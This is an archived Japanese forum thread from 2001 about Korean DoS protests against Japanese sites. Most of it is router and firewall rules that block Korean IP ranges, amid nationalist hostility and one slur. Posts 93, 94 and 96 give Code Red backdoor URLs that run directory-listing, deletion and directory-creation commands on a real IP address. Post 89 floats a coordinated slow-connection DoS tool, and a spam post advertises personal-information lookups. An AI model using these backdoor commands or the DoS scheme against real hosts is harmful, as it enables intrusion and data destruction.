 deny ip 165.132.0.0 0.0.255.255 any
 deny ip 165.133.0.0 0.0.255.255 any
 deny ip 165.141.0.0 0.0.255.255 any
 deny ip 165.186.0.0 0.0.255.255 any
 deny ip 165.194.0.0 0.0.255.255 any
 deny ip 165.213.0.0 0.0.255.255 any
 deny ip 165.229.0.0 0.0.255.255 any
 deny ip 165.243.0.0 0.0.255.255 any
 deny ip 165.244.0.0 0.0.255.255 any
 deny ip 165.246.0.0 0.0.255.255 any
 deny ip 166.79.0.0 0.0.255.255 any
 deny ip 166.103.0.0 0.0.255.255 any
 deny ip 166.104.0.0 0.0.255.255 any
 deny ip 166.125.0.0 0.0.255.255 any
 deny ip 168.78.0.0 0.0.255.255 any
 deny ip 168.115.0.0 0.0.255.255 any
 deny ip 168.126.0.0 0.0.255.255 any
 deny ip 168.131.0.0 0.0.255.255 any
 deny ip 168.154.0.0 0.0.255.255 any
 deny ip 168.188.0.0 0.0.255.255 any
 deny ip 168.219.0.0 0.0.255.255 any
 deny ip 192.249.16.0 0.0.15.255 any
 deny ip 202.6.95.0 0.0.0.255 any
 deny ip 202.14.103.0 0.0.0.255 any
 deny ip 202.14.165.0 0.0.0.255 any
 deny ip 202.20.82.0 0.0.1.255 any
 deny ip 202.20.84.0 0.0.1.255 any
 deny ip 202.20.86.0 0.0.0.255 any
 deny ip 202.20.99.0 0.0.0.255 any
 deny ip 202.20.119.0 0.0.0.255 any
 deny ip 202.20.128.0 0.0.127.255 any
 deny ip 202.21.0.0 0.0.7.255 any
 deny ip 202.30.0.0 0.1.255.255 any
 deny ip 203.224.0.0 0.31.255.255 any
 deny ip 210.90.0.0 0.1.255.255 any
 deny ip 210.92.0.0 0.3.255.255 any
 deny ip 210.96.0.0 0.31.255.255 any
 deny ip 210.178.0.0 0.1.255.255 any
 deny ip 210.180.0.0 0.3.255.255 any
 deny ip 210.204.0.0 0.3.255.255 any
 deny ip 210.216.0.0 0.7.255.255 any
 deny ip 211.32.0.0 0.31.255.255 any
 deny ip 211.104.0.0 0.7.255.255 any
 deny ip 211.112.0.0 0.7.255.255 any
 deny ip 211.168.0.0 0.7.255.255 any
 deny ip 211.176.0.0 0.15.255.255 any
 deny ip 211.192.0.0 0.63.255.255 any
 permit ip any any

68 :名無しさん:2001/08/12(日) 00:43
>>64-65 は、プロバイダ、ホスティング業者、攻撃対象になってるサイト向けの設定

>>66-67 は、個人向けの設定

69 :名無しさん:2001/08/12(日) 08:20
韓国ドメインからのサイバーデモの警告
https://www.netsecurity.ne.jp/article/1/2637.html

70 ::2001/08/12(日) 10:45
読売、産経、毎日、攻撃されてるね

71 :名無しさん@お腹いっぱい。:2001/08/12(日) 11:29
う〜ん、大変だ

72 :名無しさん@お腹いっぱい。:2001/08/12(日) 15:52
韓国うぜぇから作った。 (for ipchains-1.3.9 )
-A input --dport 80 -p 6 -j kr-fuckみたいにつかってちょ。
---こっから
:kr-fuck -
-A kr-fuck -s 61.32.0.0/255.240.0.0 -j DENY -l
-A kr-fuck -s 61.48.0.0/255.248.0.0 -j DENY -l
-A kr-fuck -s 61.72.0.0/255.248.0.0 -j DENY -l
-A kr-fuck -s 61.80.0.0/255.240.0.0 -j DENY -l
-A kr-fuck -s 61.96.0.0/255.240.0.0 -j DENY -l
-A kr-fuck -s 61.248.0.0/255.248.0.0 -j DENY -l
-A kr-fuck -s 128.134.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 129.254.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 134.75.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 137.68.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 141.223.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 143.248.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 147.6.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 147.43.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 147.46.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 147.47.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 150.150.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 150.183.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 150.197.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 152.99.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 152.149.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 154.10.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 155.230.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 156.147.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 157.197.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 158.44.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 161.122.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 163.152.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 163.180.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 163.239.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 163.243.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 164.124.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 164.125.0.0/255.255.0.0 -j DENY -l

73 :名無しさん@お腹いっぱい。:2001/08/12(日) 15:52
(続き)
-A kr-fuck -s 165.132.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 165.133.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 165.141.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 165.186.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 165.194.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 165.213.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 165.229.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 165.243.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 165.244.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 165.246.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 166.79.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 166.103.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 166.104.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 166.125.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 168.78.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 168.115.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 168.126.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 168.131.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 168.154.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 168.188.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 168.219.0.0/255.255.0.0 -j DENY -l
-A kr-fuck -s 192.249.16.0/255.240.0.0 -j DENY -l
-A kr-fuck -s 202.6.95.0/255.255.255.0 -j DENY -l
-A kr-fuck -s 202.14.103.0/255.255.255.0 -j DENY -l
-A kr-fuck -s 202.14.165.0/255.255.255.0 -j DENY -l
-A kr-fuck -s 202.20.82.0/255.255.254.0 -j DENY -l
-A kr-fuck -s 202.20.84.0/255.255.254.0 -j DENY -l
-A kr-fuck -s 202.20.86.0/255.255.254.0 -j DENY -l
-A kr-fuck -s 202.20.99.0/255.255.255.0 -j DENY -l
-A kr-fuck -s 202.20.119.0/255.255.255.0 -j DENY -l
-A kr-fuck -s 202.20.128.0/255.255.128.0 -j DENY -l
-A kr-fuck -s 202.21.0.0/255.255.248.0 -j DENY -l
-A kr-fuck -s 202.30.0.0/255.254.0.0 -j DENY -l
-A kr-fuck -s 203.224.0.0/255.224.0.0 -j DENY -l
-A kr-fuck -s 210.90.0.0/255.254.0.0 -j DENY -l
-A kr-fuck -s 210.92.0.0/255.252.0.0 -j DENY -l
-A kr-fuck -s 210.96.0.0/255.224.0.0 -j DENY -l
-A kr-fuck -s 210.178.0.0/255.254.0.0 -j DENY -l
-A kr-fuck -s 210.180.0.0/255.252.0.0 -j DENY -l
-A kr-fuck -s 210.204.0.0/255.252.0.0 -j DENY -l
-A kr-fuck -s 210.216.0.0/255.248.0.0 -j DENY -l
-A kr-fuck -s 211.32.0.0/255.224.0.0 -j DENY -l
-A kr-fuck -s 211.104.0.0/255.248.0.0 -j DENY -l
-A kr-fuck -s 210.112.0.0/255.248.0.0 -j DENY -l
-A kr-fuck -s 210.168.0.0/255.248.0.0 -j DENY -l
-A kr-fuck -s 210.176.0.0/255.240.0.0 -j DENY -l
-A kr-fuck -s 210.192.0.0/255.192.0.0 -j DENY -l
-A kr-fuck -s 0.0.0.0/0.0.0.0 -j ACCEPT
--- 終わり。

74 :名無しさん@お腹いっぱい。:2001/08/12(日) 16:08
つーか、素朴な疑問。
なんで対象の6団体には靖国神社そのもの ( http://www.yasukuni.or.jp/ )
が含まれてないのかね。
#余計なお世話だから、下げとくが。

75 :名無しさん@お腹いっぱい。:2001/08/12(日) 16:39
韓国切るとまじで静かになった。
もっとはやく切っとけばよかった。

76 :名無しさん@お腹いっぱい。:2001/08/12(日) 22:22
靖国切るとまじで静かになった。
もっとはやく切っとけばよかった。

77 :名無しさん@お腹いっぱい。:2001/08/12(日) 22:25
>>74
韓国には神社って概念が無いからな。
組織として認知してないからホムペがあるとは思ってないんでない?
あるいは靖国を直接に叩く日本のマスコミも皆無なのも原因かも。

78 :名無しさん:2001/08/13(月) 00:24
IOS 11.x用 韓国ブロックaccess-list Part1

access-list 82 deny 61.32.0.0 0.15.255.255
access-list 82 deny 61.48.0.0 0.7.255.255
access-list 82 deny 61.72.0.0 0.7.255.255
access-list 82 deny 61.80.0.0 0.15.255.255
access-list 82 deny 61.96.0.0 0.15.255.255
access-list 82 deny 61.248.0.0 0.7.255.255
access-list 82 deny 128.134.0.0 0.0.255.255
access-list 82 deny 129.254.0.0 0.0.255.255
access-list 82 deny 134.75.0.0 0.0.255.255
access-list 82 deny 137.68.0.0 0.0.255.255
access-list 82 deny 141.223.0.0 0.0.255.255
access-list 82 deny 143.248.0.0 0.0.255.255
access-list 82 deny 147.6.0.0 0.0.255.255
access-list 82 deny 147.43.0.0 0.0.255.255
access-list 82 deny 147.46.0.0 0.0.255.255
access-list 82 deny 147.47.0.0 0.0.255.255
access-list 82 deny 150.150.0.0 0.0.255.255
access-list 82 deny 150.183.0.0 0.0.255.255
access-list 82 deny 150.197.0.0 0.0.255.255
access-list 82 deny 152.99.0.0 0.0.255.255
access-list 82 deny 152.149.0.0 0.0.255.255
access-list 82 deny 154.10.0.0 0.0.255.255
access-list 82 deny 155.230.0.0 0.0.255.255
access-list 82 deny 156.147.0.0 0.0.255.255
access-list 82 deny 157.197.0.0 0.0.255.255
access-list 82 deny 158.44.0.0 0.0.255.255
access-list 82 deny 161.122.0.0 0.0.255.255
access-list 82 deny 163.152.0.0 0.0.255.255
access-list 82 deny 163.180.0.0 0.0.255.255
access-list 82 deny 163.239.0.0 0.0.255.255
access-list 82 deny 163.243.0.0 0.0.255.255
access-list 82 deny 164.124.0.0 0.0.255.255
access-list 82 deny 164.125.0.0 0.0.255.255

(つづく)

79 :名無しさん:2001/08/13(月) 00:24
IOS 11.x用 韓国ブロックaccess-list Part2
(つづき)

access-list 82 deny 165.132.0.0 0.0.255.255
access-list 82 deny 165.133.0.0 0.0.255.255
access-list 82 deny 165.141.0.0 0.0.255.255
access-list 82 deny 165.186.0.0 0.0.255.255
access-list 82 deny 165.194.0.0 0.0.255.255
access-list 82 deny 165.213.0.0 0.0.255.255
access-list 82 deny 165.229.0.0 0.0.255.255
access-list 82 deny 165.243.0.0 0.0.255.255
access-list 82 deny 165.244.0.0 0.0.255.255
access-list 82 deny 165.246.0.0 0.0.255.255
access-list 82 deny 166.79.0.0 0.0.255.255
access-list 82 deny 166.103.0.0 0.0.255.255
access-list 82 deny 166.104.0.0 0.0.255.255
access-list 82 deny 166.125.0.0 0.0.255.255
access-list 82 deny 168.78.0.0 0.0.255.255
access-list 82 deny 168.115.0.0 0.0.255.255
access-list 82 deny 168.126.0.0 0.0.255.255
access-list 82 deny 168.131.0.0 0.0.255.255
access-list 82 deny 168.154.0.0 0.0.255.255
access-list 82 deny 168.188.0.0 0.0.255.255
access-list 82 deny 168.219.0.0 0.0.255.255
access-list 82 deny 192.249.16.0 0.0.15.255
access-list 82 deny 202.6.95.0 0.0.0.255
access-list 82 deny 202.14.103.0 0.0.0.255
access-list 82 deny 202.14.165.0 0.0.0.255
access-list 82 deny 202.20.82.0 0.0.1.255
access-list 82 deny 202.20.84.0 0.0.1.255
access-list 82 deny 202.20.86.0 0.0.0.255
access-list 82 deny 202.20.99.0 0.0.0.255
access-list 82 deny 202.20.119.0 0.0.0.255
access-list 82 deny 202.20.128.0 0.0.127.255
access-list 82 deny 202.21.0.0 0.0.7.255
access-list 82 deny 202.30.0.0 0.1.255.255
access-list 82 deny 203.224.0.0 0.31.255.255
access-list 82 deny 210.90.0.0 0.1.255.255
access-list 82 deny 210.92.0.0 0.3.255.255
access-list 82 deny 210.96.0.0 0.31.255.255
access-list 82 deny 210.178.0.0 0.1.255.255
access-list 82 deny 210.180.0.0 0.3.255.255
access-list 82 deny 210.204.0.0 0.3.255.255
access-list 82 deny 210.216.0.0 0.7.255.255
access-list 82 deny 211.32.0.0 0.31.255.255
access-list 82 deny 211.104.0.0 0.7.255.255
access-list 82 deny 211.112.0.0 0.7.255.255
access-list 82 deny 211.168.0.0 0.7.255.255
access-list 82 deny 211.176.0.0 0.15.255.255
access-list 82 deny 211.192.0.0 0.63.255.255
access-list 82 permit any

80 :ブラックリスト:2001/08/13(月) 02:58
貴方に代わって恨み晴らします!

騙された・捨てられた・弄ばれた・相手に誠意がない・債権トラブル・不倫疑惑・証拠が欲しい・
電話番号などから住所などの詳細を調べて欲しい・等など
何でも気軽に相談下さい。確実に貴方の悩みや困り事、トラブル等を迅速に解決致します。
i-mode・j-sky対応
http://www.black-893.com

81 :名無しさん@お腹いっぱい。:2001/08/13(月) 15:28
ぉぃぉぃ小泉ちゃん今日参拝かよ。
カンコックの野郎も前倒しで攻撃はじめるんでない?

82 :名無し:2001/08/13(月) 17:12
攻撃開始だってさ。

83 :名無しさん@お腹いっぱい。:2001/08/13(月) 17:23
韓国ネティズンがハックするHP一覧
http://www.mext.go.jp/
http://www.sankei.co.jp/
http://www.jimin.or.jp/jimin/title.html
http://www.tsukurukai.com/ (ハクられた模様)

84 :名無しさん@お腹いっぱい。:2001/08/13(月) 17:32
靖国神社もDoSアタック食ってる
ttp://www.yasukuni.or.jp
文部省・産経新聞・自民党はあらかじめパケットフィルタかました模様
作る会はDDoSくらったかな

85 : チビリアン:2001/08/13(月) 20:39
キムチ串経由で>>83のサイトにつないでみた
http://www.mext.go.jp/ 〜つながる
http://www.sankei.co.jp/ 〜串エラーではじかれた
http://www.jimin.or.jp/jimin/title.html 〜つながる
http://www.tsukurukai.com/ 〜串エラーではじかれた(でもまだおちてる)

あと、扶桑社とzakzakはキムチ串でもつながった。

86 :名無しさん:2001/08/13(月) 20:49
http://www.kishou.go.jp/
気象庁も、韓国語でハックに遭う・・・

87 :名無しさん:2001/08/13(月) 20:49
>>86
訂正・韓国語→中国語

88 :名無しさん@お腹いっぱい:2001/08/13(月) 23:03
http://www.jinji.admix.go.jp/
人事院HPが応答しないよー。

89 :名無しさん@お腹いっぱい。:2001/08/13(月) 23:39
単にリクエスト何回も送るより、「リクエストを途中で止めてコネクション張りっぱなしにする」ようなプログラムを同時に動かした方が、サーバの負担重くならない?
だったら、事前にそういうプログラム配布していっせーのせで起動させると効率上がるよね?

90 :名無しさん:2001/08/13(月) 23:56
おいおい・・・
このすれにでてきたような対策を全サイトでやってほしかったなぁ

91 :名無しさん@お腹いっぱい。:2001/08/14(火) 01:00
で、攻撃しようとしている首謀者はどこ?

92 :名無しさん:2001/08/14(火) 01:52
しかし気象庁はヴァカだね
ファイアウォールさえ入れていれば大丈夫なんて、
そんな時代遅れなこといってるとは・・・

逝ってヨシですな

93 :名無しさん@お腹いっぱい。:2001/08/14(火) 01:53
.
http://210.130.65.190/scripts/root.exe?/c+dir+"c:\"

94 :名無しさん@お腹いっぱい。:2001/08/14(火) 02:08
http://210.130.65.190/scripts/rock.exe?/c+del.exe+"d:\"

95 :名無しさん@お腹いっぱい。:2001/08/14(火) 03:00
>>93
よく飽きねぇな?

>>94
それはネタか?

96 :名無しさん@お腹いっぱい。:2001/08/14(火) 03:17
http://210.130.65.190/scripts/root.exe?/c+md+"c:\あなたのマシンはコード・レッドにやられています。皆さんに迷惑をかけないでください。\確かに\遊ぶのはやめよう"

97 :sage:2001/08/14(火) 19:31
slashdot.jpで、崎山君活躍。
http://slashdot.jp/article.pl?sid=01/08/10/2152209&mode=thread&threshold=

98 :名無しさん:2001/08/14(火) 20:13
>>97
みてかなりワロタ
ほとんど全員から批判されてるね

99 :名無しさん:2001/08/14(火) 20:15
みれないのがおおいから、
http://slashdot.jp/article.pl?sid=01/08/10/2152209&mode=nested&threshold=-1
のほうがいいんじゃない?

100 :名無しさん@お腹いっぱい。:2001/08/14(火) 20:23
名言集
http://slashdot.jp/users.pl?op=userinfo&nick=sakichan
webサイト
http://www.lares.dti.ne.jp/~sakichan/

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)